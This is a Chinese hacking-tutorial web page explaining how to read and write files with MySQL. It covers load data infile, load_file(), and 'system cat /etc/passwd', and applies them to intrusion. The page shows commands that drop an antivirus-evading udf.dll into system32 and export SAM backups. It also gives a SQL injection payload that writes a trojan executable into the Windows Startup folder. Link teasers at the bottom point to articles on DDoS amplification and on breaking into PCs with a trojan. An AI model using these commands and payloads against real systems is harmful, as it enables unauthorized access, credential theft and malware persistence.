建站极客
网络安全 黑客教程 正文
mysql 读取文件的几种方式及应用
所属分类:
网络安全 / 黑客教程
阅读数:
100
收藏 0
赞 0
分享
章出处:C.R.S.T 作者:sai52[B.H.S.T] blog:www.sai52.com 今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同 mysql3.x下 不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 mysql>create table a (cmd text); mysql>load data infile 'c:\\boot.ini' into table a; mysql>select * from a; mysql4.x下 mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 mysql>create table a (cmd text); mysql>insert into a (cmd) values (load_file('c:\\boot.ini')); mysql>select * from a; mysql5.x下 在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 mysql>system cat /etc/passwd mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 例:把免杀过的udf.dll文件插入系统目录 create table a (cmd LONGBLOB); insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll'; 其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中理论上应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 注入中的语法 [Copy to clipboard] [ - ]CODE: id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/mm.exe'/* 测试后发现注入中运用不太现实,因为要导出二进制文件要求必须数据类型为blob或longblob,现实中极少用到。
Android平台的SQL注入漏洞浅析(一条短信控制你的手机) 14年11月笔者在百度xteam博客中看到其公开了此前报告给Google的CVE-2014-8507漏洞细节——系统代码在处理经由短信承载的WAP推送内容时产生的经典SQL注入漏洞,影响Android 5.0以下的系统
评论 0
收藏 0
赞 0
分享
浅析XSS与XSSI异同 这篇文章主要介绍了XSS与XSSI异同,跨站脚本(XSS)和跨站脚本包含(XSSI)之间的区别是什么?防御方法有什么不同?感兴趣的小伙伴们可以参考一下
评论 0
收藏 0
赞 0
分享
没有苹果官方支持 是否可以重置MAC系统固件密码 不开源就意味着更干净更安全,现在连苹果都要准备部分开源给第三方软件了,是不是意味着苹果的安全也不如想象中的那么强大了?这个猜测并没有证据,有证据的是,iMac和MacBook的固件密码已经可以破解重置了
评论 0
收藏 0
赞 0
分享
躲避黑客的七大高招教程 现在电脑用户最讨厌的就是黑客,有用户问怎么才能高效的躲避黑客的入侵呢?下面小编就为大家介绍七大高招,让你的电脑时时刻刻处于安全状态
评论 0
收藏 0
赞 0
分享
在线DDoS攻击平台是什么 DDoS攻击平台的流量获取方式 流量获取是DDOS攻击的最重要一环,黑客主要通过获取厂商服务器的上行流量,致使你的服务器、电脑所属的网络或者系统资源耗尽而瘫痪,让你失去目标客户,借此用来勒索厂商。本文讲述了黑客获取流量的主要六种方式
评论 0
收藏 0
赞 0
分享
如何提高DDoS攻击效率 增强DDoS攻击效果的思路 在我们的思维都朝着一个方向走的时候,忽然的转向会让人茅塞顿开。黑客在我眼中就是一群思维习惯不同的人,他们从不朝着同一个方向走,所以你才会被他们发现这么多的漏洞。一把手枪,四颗子弹,你能让子弹同时击中同一个目标来达到最强的杀伤力吗
评论 0
收藏 0
赞 0
分享
十三步简单入侵个人电脑教程 下面小编就为电脑新手们打造了一个教程,从来没有通过网络进入别人电脑的用户快来看看吧,主要使用到的软件就是著名的国产木马冰河2.
评论 0
收藏 0
赞 0
分享
DNS协议欺骗攻击技术的攻防知识 DNS欺骗攻击和防范方法有哪些 你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址,但是打开的并不是你想要去的网站。它可能是114的查询页面,可能是一个广告页面,更可能是一个刷流量的页面,甚至是一个挂马的网站。如果你遇到了上述情况话,那么极有可能你遭遇了DNS欺骗。
评论 0
收藏 0
赞 0
分享
查看更多